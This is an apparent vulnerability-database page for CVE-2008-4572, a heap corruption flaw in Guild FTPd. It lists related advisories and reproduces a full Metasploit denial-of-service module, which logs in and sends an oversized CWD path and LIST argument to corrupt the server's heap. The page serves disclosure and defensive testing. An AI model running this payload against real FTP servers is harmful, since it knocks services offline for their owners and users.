Lucene search
K

Guild FTPd 0.999.8.11/0.999.14 Heap Corruption

🗓️ 31 Aug 2024 00:00:00Reported by Kris Katterjohn, metasploit.comType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 165 Views

Guild FTPd 0.999.8.11/0.999.14 Heap Corruption vulnerability, requires valid login for CWD and LIST command

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2008-4572
15 Oct 200820:00
attackerkb
Circl
CVE-2008-4572
12 Oct 200800:00
circl
CVE
CVE-2008-4572
15 Oct 200818:12
cve
Cvelist
CVE-2008-4572
15 Oct 200818:12
cvelist
Metasploit
Guild FTPd 0.999.8.11/0.999.14 Heap Corruption
9 Jan 200905:33
metasploit
NVD
CVE-2008-4572
15 Oct 200820:00
nvd
OpenVAS
GuildFTPd CWD and LIST Command Heap Overflow Vulnerability
21 Oct 200800:00
openvas
OpenVAS
GuildFTPd CWD and LIST Command Heap Overflow Vulnerability
21 Oct 200800:00
openvas
Prion
Heap overflow
15 Oct 200820:00
prion
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::Ftp  
include Msf::Auxiliary::Dos  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Guild FTPd 0.999.8.11/0.999.14 Heap Corruption',  
'Description' => %q{  
Guild FTPd 0.999.8.11 and 0.999.14 are vulnerable  
to heap corruption. You need to have a valid login  
so you can run CWD and LIST.  
},  
'Author' => 'kris katterjohn',  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'CVE', '2008-4572' ],  
[ 'OSVDB', '49045' ],  
[ 'EDB', '6738']  
],  
'DisclosureDate' => '2008-10-12'))  
  
# They're required  
register_options([  
OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ], fallbacks: ['USERNAME']),  
OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ], fallbacks: ['PASSWORD'])  
])  
end  
  
def run  
return unless connect_login  
  
print_status("Sending commands...")  
  
# We want to try to wait for responses to these  
resp = send_cmd(['CWD', '/.' * 124])  
resp = send_cmd(['LIST', 'X' * 100])  
  
disconnect  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Aug 2024 00:00Current
7High risk
Vulners AI Score7
CVSS 210
EPSS0.7687
165